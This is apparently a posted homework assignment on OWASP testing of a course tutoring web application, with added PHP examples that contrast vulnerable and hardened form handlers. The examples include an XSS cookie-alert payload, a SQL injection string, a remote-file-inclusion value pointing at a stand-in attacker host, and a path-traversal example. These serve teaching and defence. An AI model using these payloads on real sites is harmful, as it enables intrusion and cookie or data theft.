MUST FOLLOW THE ATTACHED GRADING RUBRIC. NO EXCUSES!
Let's chat ASAP for more details.
Using the readings from weeks 7 and 8 as a baseline, analyze, test, and document the results for the tutoring web application found on the SDEV virtual machine. Use both manual means and automated tools (e.g., OWASP ZAP); the latter will discover more than a cursory manual examination. Specific tests to be conducted include:
1. Testing for Reflected Cross-Site Scripting (OTG-INPVAL-001)
What is the importance of testing for this vulnerability? How many occurrences of the vulnerability did an automated scan discover? What is your recommendation to address any issues? Can you trigger a simple JavaScript alert (e.g., using DeleteSession.php as an example)?
2. Testing for Stored Cross-Site Scripting (OTG-INPVAL-002)
What is the importance of testing for this vulnerability? What happens when you attempt to add a pop-up window (e.g., <script>alert(document.cookie)</script>) through the email input field on the index.html page? Can you introduce stored cross-site scripting?
3. Testing for SQL Injection (OTG-INPVAL-005)
Did your manual and automated testing discover any SQL injection vulnerabilities, and if so, how many? (Note: there should be at least one occurrence.) Name two or more steps you can take, according to the reading, to resolve the issue. Fix and test at least one occurrence of the vulnerability, showing your resulting source code and output.
4. Testing for Code Injection (OTG-INPVAL-012)
What is the importance of testing for this vulnerability? What are at least two measures you can take to remediate this issue? Can you inject some simple HTML, or exploit Remote File Inclusion (RFI)?
5. Test Business Logic Data Validation (OTG-BUSLOGIC-001)
What are at least two examples of business logic errors? These could come from the various input forms or areas you discovered in previous homework assignments. How can you mitigate such errors?
6. Test Integrity Checks (OTG-BUSLOGIC-003)
Do drop-down menus exist, and are they sufficient for the application? Why does the use of drop-down menus help mitigate this risk? Does your manual or automated scan reveal the use of password AUTOCOMPLETE? What issue, if any, does the use of AUTOCOMPLETE pose?
7. Test Defenses Against Application Misuse (OTG-BUSLOGIC-007)
What is the importance of testing for this vulnerability? Can adding extra characters in input fields cause unexpected results? Verify for at least two instances.
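The following is an added example for items 1 to 3 and is not code from the tutoring application: an email sign-up handler of the kind index.html posts to, shown first as the vulnerable pattern a ZAP scan reports and then hardened with server-side validation, a prepared statement, and output encoding. The form field name `email`, the table `subscribers(email)`, and the use of PDO are hypothetical assumptions; the SQLite database is created in memory so the script runs stand-alone with `php example.php`.

```php
<?php
// Added example, not the tutoring application's own code. Assumptions
// (hypothetical): the form field is `email`, rows go into a table
// `subscribers(email)`, and the page talks to its database through PDO.
declare(strict_types=1);

// Vulnerable: input concatenated into SQL (OTG-INPVAL-005) and echoed back
// unencoded (OTG-INPVAL-001/002), so <script>alert(document.cookie)</script>
// is both stored and later rendered as live markup.
function vulnerable_subscribe(PDO $db, array $post): string
{
    $email = (string)($post['email'] ?? '');
    $db->exec("INSERT INTO subscribers (email) VALUES ('$email')");
    return "Thanks, $email";
}

// Hardened: validate, parameterise, and encode on output.
function hardened_subscribe(PDO $db, array $post): string
{
    $email = trim((string)($post['email'] ?? ''));

    // 1. Server-side validation: anything that is not an address is rejected,
    //    which also stops the scanner's <script> payloads at the door.
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return 'Invalid email address.';
    }

    // 2. Prepared statement: the value is bound as data and cannot change the
    //    SQL grammar, whatever characters it contains.
    $stmt = $db->prepare('INSERT INTO subscribers (email) VALUES (:email)');
    $stmt->execute([':email' => $email]);

    // 3. Contextual output encoding: < > " ' & are rendered as text, so
    //    valid-but-odd input such as o'neil@... cannot break out of the HTML
    //    context either.
    return 'Thanks, ' . htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Self-contained demonstration against an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subscribers (email TEXT)');

// Constructed payload: closes the VALUES tuple and smuggles in a second row.
$injection = ['email' => "a@test.invalid'), ('attacker@evil.invalid"];
vulnerable_subscribe($db, $injection);
printf("rows after vulnerable handler: %d\n",
    $db->query('SELECT COUNT(*) FROM subscribers')->fetchColumn());

$db->exec('DELETE FROM subscribers');
echo hardened_subscribe($db, $injection), "\n";
printf("rows after hardened handler: %d\n",
    $db->query('SELECT COUNT(*) FROM subscribers')->fetchColumn());

echo hardened_subscribe($db, ['email' => '<script>alert(document.cookie)</script>']), "\n";
echo hardened_subscribe($db, ['email' => "o'neil@example.invalid"]), "\n";
```

The vulnerable handler ends up with two rows from a single submission, which is the same class of finding the scanner will report against the real form; the hardened handler rejects the payload, inserts only what it validated, and encodes whatever it echoes. Validation and encoding are both kept because each covers a case the other does not: validation limits what is stored, encoding protects the page when a value that passed validation still contains HTML-significant characters.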
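The following is an added example for items 4 to 7 and is not code from the tutoring application: allow-list handling for a page-selection parameter (the code injection and RFI case) and server-side re-validation of a booking form (business-logic checks, drop-down integrity, and oversized input). The page names, subject list, field names, and the 30 to 120 minute session rule are hypothetical assumptions about the application. The point of the second half is the caveat a practitioner wants to attach to item 6: a drop-down menu constrains only the browser, and an intercepting proxy such as ZAP can submit any value, so the server must check the value against the same list.

```php
<?php
// Added example, not the tutoring application's own code. Page names,
// subjects, field names, and business rules below are hypothetical.
declare(strict_types=1);

// Item 4 (OTG-INPVAL-012): the vulnerable pattern is
//     include($_GET['page'] . '.php');
// which lets ?page=http://attacker.invalid/shell pull in remote code when
// allow_url_include is on, and ?page=../../etc/passwd read files otherwise.
// Resolve the request through a fixed map instead; the user's value is
// never used as a path.
const PAGES = [
    'home'     => 'index.php',
    'tutors'   => 'tutors.php',
    'schedule' => 'schedule.php',
];

function resolve_page(string $requested): string
{
    return PAGES[$requested] ?? PAGES['home'];
}

// Items 5 to 7 (OTG-BUSLOGIC-001/003/007): re-validate every field on the
// server, including those the browser presents as a drop-down.
const SUBJECTS = ['math', 'physics', 'chemistry'];
const MAX_NAME_LEN = 64;

function validate_booking(array $post): array
{
    $errors = [];

    // Integrity check: the drop-down value must be one the form offers.
    $subject = (string)($post['subject'] ?? '');
    if (!in_array($subject, SUBJECTS, true)) {
        $errors[] = 'subject not in allowed list';
    }

    // Application misuse: bound every free-text field by length.
    $name = (string)($post['name'] ?? '');
    if ($name === '' || strlen($name) > MAX_NAME_LEN) {
        $errors[] = 'name missing or longer than ' . MAX_NAME_LEN . ' bytes';
    }

    // Business rule: a session is a whole number of minutes, 30 to 120.
    $minutes = filter_var($post['minutes'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 30, 'max_range' => 120]]);
    if ($minutes === false) {
        $errors[] = 'minutes must be an integer between 30 and 120';
    }

    // Business rule: a session cannot be booked in the past.
    $date = DateTimeImmutable::createFromFormat('!Y-m-d', (string)($post['date'] ?? ''));
    if ($date === false || $date < new DateTimeImmutable('today')) {
        $errors[] = 'date must be today or later, in YYYY-MM-DD form';
    }

    return $errors;
}

// Constructed requests: a normal page request, an RFI attempt, and a booking
// form tampered with through a proxy after the drop-down was bypassed.
echo resolve_page('tutors'), "\n";
echo resolve_page('http://attacker.invalid/shell'), "\n";

$tampered = [
    'subject' => 'free_session',       // value the drop-down never offered
    'name'    => str_repeat('A', 5000), // far beyond any real name
    'minutes' => '-30',                 // negative duration
    'date'    => '2000-01-01',          // booking in the past
];
print_r(validate_booking($tampered));
```

Run it with `php example.php`. The RFI attempt resolves to the home page rather than to a remote or traversed path, and the tampered booking produces one error per violated rule, which is the evidence a report for items 5 to 7 needs: the client-side control is not the control, the server-side check is.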
General Guidelines
Document the results of the tests, your comments, and your recommendations for improved security for each security control tested in a Word or PDF document. Use the reporting format recommended in chapter 5 of the OWASP Testing Guide. Provide screen captures and descriptions of the tests conducted, and discuss any issues found and possible mitigations.
Note: Use the SDEV virtual machine you downloaded and used for SDEV 300. If you need to download it again, the URL is https://citeapps.umuc.edu/SDEV/. The VM runs on the latest version of Oracle VirtualBox. Directions for reinstalling the Tutoring Web Application, including any required passwords, are in the course resources.
Deliverables:
Submit your document by the due date. It should be well organized, use the OWASP recommended reporting format, include all references used, and contain minimal spelling and grammar errors.